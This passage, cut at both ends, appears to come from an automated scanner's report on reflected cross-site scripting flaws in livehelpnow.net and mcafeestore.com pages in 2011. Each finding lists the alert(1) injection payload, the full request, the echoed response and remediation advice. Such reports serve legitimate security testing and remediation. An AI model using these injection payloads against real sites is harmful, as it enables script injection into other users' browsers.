getitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 1602 + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=0625df";alert(1)//6bec7c98aa2&rndstr=" + lhnrand_no + "'>
...[SNIP]...

3.418. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the iheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4de7b"%3balert(1)//82e30231328 was submitted in the iheight parameter. This input was echoed as 4de7b";alert(1)//82e30231328 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=524de7b"%3balert(1)//82e30231328&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:14 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27332


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
<img width=153 height=524de7b";alert(1)//82e30231328 alt='Live Help' id=lhnchatimg border=0 nocache src='https://www.livehelpnow.net/lhn/functions/imageserver.ashx?lhnid=" + 6674 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferr
...[SNIP]...

3.419. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the iheight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d420'%3balert(1)//1ab9180e9c8 was submitted in the iheight parameter. This input was echoed as 8d420';alert(1)//1ab9180e9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=528d420'%3balert(1)//1ab9180e9c8&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:14 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27332


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
+ ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes');
   }

Zslide();
}

if (('153'!='') && ('528d420';alert(1)//1ab9180e9c8'!=''))
{
   if (document.location.protocol=='https:')
   {
       document.write("<a href=\"#\" onclick=\"OpenLHNChat();return false;\">
...[SNIP]...

3.420. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the iwidth request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24a9d'%3balert(1)//12dd260b5d was submitted in the iwidth parameter. This input was echoed as 24a9d';alert(1)//12dd260b5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=15324a9d'%3balert(1)//12dd260b5d&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:14 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27329


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
eft=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=no,copyhistory=no,resizable=yes');
   }

Zslide();
}

if (('15324a9d';alert(1)//12dd260b5d'!='') && ('52'!=''))
{
   if (document.location.protocol=='https:')
   {
       document.write("<a href=\"#\" onclick=\"OpenLHNChat();return false;\">
...[SNIP]...

3.421. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [iwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the iwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d986e"%3balert(1)//33c82be1078 was submitted in the iwidth parameter. This input was echoed as d986e";alert(1)//33c82be1078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153d986e"%3balert(1)//33c82be1078&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:14 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27332


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
<img width=153d986e";alert(1)//33c82be1078 height=52 alt='Live Help' id=lhnchatimg border=0 nocache src='https://www.livehelpnow.net/lhn/functions/imageserver.ashx?lhnid=" + 6674 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" +
...[SNIP]...

3.422. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 43ce9%3balert(1)//7a45b0cc4f0 was submitted in the lhnid parameter. This input was echoed as 43ce9;alert(1)//7a45b0cc4f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=667443ce9%3balert(1)//7a45b0cc4f0&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:13 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 10029


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
ion.protocol=='https:' || (typeof lhnJsHost !='undefined' && lhnJsHost == "https://"))
   {
       window.open('https://www.livehelpnow.net/lhn/livechatvisitor.aspx?zzwindow=' + lhnwindow + '&lhnid=' + 667443ce9;alert(1)//7a45b0cc4f0 + '&d=' + 0,'lhnchat','left=' + wleft + ',top=' + wtop + ',width=580,height=435,toolbar=no,location=no,directories=no,status=yes,menubar=no,scrollbars=' + sScrollbars + ',copyhistory=no,resizable=yes'
...[SNIP]...

3.423. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31c90"%3balert(1)//d2dc7402ec7 was submitted in the lhnid parameter. This input was echoed as 31c90";alert(1)//d2dc7402ec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=667431c90"%3balert(1)//d2dc7402ec7&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:13 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 10039


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=50.23.123.106|667431c90";alert(1)//d2dc7402ec7|9/30/2011 8:25:13 AM' />
...[SNIP]...

3.424. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 30155%3balert(1)//b4ab12f6b54 was submitted in the zimg parameter. This input was echoed as 30155;alert(1)//b4ab12f6b54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=160230155%3balert(1)//b4ab12f6b54&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=0&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:13 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27356


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
geserver.ashx?lhnid=" + 6674 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 160230155;alert(1)//b4ab12f6b54 + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=0&rndstr=" + lhnrand_no + "'>
...[SNIP]...

3.425. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zzwindow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zzwindow request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98172'%3balert(1)//09425fa3c1e was submitted in the zzwindow parameter. This input was echoed as 98172';alert(1)//09425fa3c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=1602&lhnid=6674&iv=1&iwidth=153&iheight=52&zzwindow=098172'%3balert(1)//09425fa3c1e&d=0&custom1=&custom2=&custom3= HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://posnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 30 Sep 2011 12:25:14 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 27276


var lhnTrack='';
var blhnInstalled=0;
if (typeof lhnInstalled !='undefined'){lhnTrack='f';blhnInstalled=1;}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnli
...[SNIP]...
< millis);
}

if (blhnInstalled==0)
{
var lhnjava;
var lhnreg = new RegExp('/');
var lhnreferrer = escape(document.referrer);
var lhnwindow='098172';alert(1)//09425fa3c1e';

var lhnpagetitle=(document.title.length>
...[SNIP]...

3.426. http://www.mcafeestore.com/store [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 97f5c--><script>alert(1)</script>80c456126cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayHomePage&Env=BASE&Locale=en_GB&SiteID=mfe&97f5c--><script>alert(1)</script>80c456126cf=1 HTTP/1.1
Host: www.mcafeestore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=w&sourceid=chrome&ie=UTF-8&q=secured+by+macafee#sclient=psy-ab&hl=en&source=hp&q=secured+by+macafee+store&pbx=1&oq=secured+by+macafee+store&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=2661l3411l0l3507l6l5l0l0l0l0l441l1220l3-1.2l3l0&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=f2d1beb1c4e15df7&biw=962&bih=877
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc1pod6-pool2-active=2466382090.772.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=64806100151,0)
Date: Fri, 30 Sep 2011 12:01:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app65
Content-Length: 27266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?97f5c--><script>alert(1)</script>80c456126cf=1&Action=DisplayESIPage&Currency=GBP&ESIHC=9e374b31&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=25180600&StyleVersion=30&ceid=176851100&cename=TopHeader&id=HomeOffersPage"-->
...[SNIP]...

3.427. http://www.mcafeestore.com/store/mfe/DisplayHomePage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a25b--><script>alert(1)</script>20333834b39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage?3a25b--><script>alert(1)</script>20333834b39=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=172182913173,0)
Content-Length: 27309
Date: Fri, 30 Sep 2011 12:44:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?3a25b--><script>alert(1)</script>20333834b39=1&Action=DisplayESIPage&Currency=GBP&ESIHC=4b937cbd&Env=BASE&Locale=en_GB&SiteID=mfe&StyleID=25180600&StyleVersion=30&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.428. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b0da8--><script>alert(1)</script>3eb6e67c250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK?b0da8--><script>alert(1)</script>3eb6e67c250=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859114603,0)
Content-Length: 22351
Date: Fri, 30 Sep 2011 12:45:27 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="da" lang="da">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=DKK&ESIHC=c4711e3e&Env=BASE&Locale=da_DK&SiteID=mfe&StyleID=25691600&StyleVersion=17&b0da8--><script>alert(1)</script>3eb6e67c250=1&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.429. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9f62--><script>alert(1)</script>3b66fc163e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.da_DK/Currency.DKK%20?e9f62--><script>alert(1)</script>3b66fc163e6=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21859104265,0)
Content-Length: 22379
Date: Fri, 30 Sep 2011 12:45:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="da" lang="da">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=DKK&Currency=DKK+&ESIHC=c4711e3e&Env=BASE&Locale=da_DK&SiteID=mfe&StyleID=25691600&StyleVersion=17&ceid=176851100&cename=TopHeader&e9f62--><script>alert(1)</script>3b66fc163e6=1&id=HomeOffersPage&script>
...[SNIP]...

3.430. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.de_DE [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.de_DE

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9a012--><script>alert(1)</script>4b5e159ff0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/mfe/DisplayHomePage/locale.de_DE?9a012--><script>alert(1)</script>4b5e159ff0c=1 HTTP/1.1
Host: www.mcafeestore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=137823220027,0)
Content-Length: 24232
Date: Fri, 30 Sep 2011 12:45:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app67
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="de" lang="de">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!--!esi:include src="/store?9a012--><script>alert(1)</script>4b5e159ff0c=1&Action=DisplayESIPage&Currency=EUR&ESIHC=c4711e3e&Env=BASE&Locale=de_DE&SiteID=mfe&StyleID=25691100&StyleVersion=20&ceid=176851100&cename=TopHeader&id=HomeOffersPage&script>
...[SNIP]...

3.431. http://www.mcafeestore.com/store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mcafeestore.com
Path:   /store/mfe/DisplayHomePage/locale.en_AU/Currency.AUD

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a1803--><ScRiPt>alert(1)</ScRiPt>90a9b8ecfa6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

